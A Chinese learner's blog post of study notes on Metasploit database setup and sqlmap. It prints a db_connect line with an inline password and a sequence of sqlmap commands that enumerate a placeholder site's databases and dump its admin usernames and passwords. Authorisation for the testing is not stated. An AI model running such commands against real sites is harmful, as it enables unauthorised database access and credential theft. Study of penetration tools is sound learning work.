metasploit渗透测试学习笔记(二)

现在已经在看那本metasploit渗透测试指南了,虽然书是12年的,但还是有很多知识,当然很多疑惑,毕竟我在用的是kali。。。版本有很大改变。。难过好多不准!,还有就是连接数据库的问题,看了网上答案,应该先看看database.yml这个文件(我猜的,大神求教)

cat /opt/metasploit/config/database.yml


已显示密码了。

接着看看它用那个端口:

netstat -tnpl | grep postgres
而后:
db_connect msf3:4bfedc2@localhost:端口/msf3

在看看状态

db_status

ok 已连接

呵呵~~~~~


后来又跟着大神xiao136xx(网易博客)传送门大神的大神,学了点sqlmap,的确长知识了不少,如下:

sqlmap --url http://www.xxxx.asp?id=xx --dbs
 --url 目标url。

--dbs 枚举数据库。



然后枚举表。


表名已出来。

然后枚举数据库表列:

看username,password已出来,所以现在正式开始猜解:

--dump转储,也就是下载的意思吧。

为什么

<span style="background-color: rgb(255, 102, 102);">resumed:dba902f69c09ceb8

resumed:jx_lc_ztxx
</span>
呢?
因为我之前测试过了-。-!
<pre class="html" name="code">sqlmap --url http://www.xxxx.asp?id=xx -D 数据库 -T admin -C ”password,username“ --dump
OK了
上面就是登录名和密码了,别问我解密不出来,我特么也没办法。。。呵呵。
</pre><pre class="html" name="code">好吧,还有为什么背景图不一样呢,那是因为前一个在backtrack5下面测试,另一个在kali啦。。。。
我好无聊额(我知道没人看的zzz)。
 
好累,最近一直在测试学习metasploit,但我好厌恶我总是没什么进步,一天都呆在实验室,一天都在测试,没什么效果啊,我要崩溃了。
 
旁边小伙伴问我,你最孤独的时候是什么?
呵呵,我早已习惯了。。。。。。。。。。。--! :)
 

雄关漫道真如铁,万水千山不等闲啊!

不说了,我去泡杯奶茶压压惊。:)



 



  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值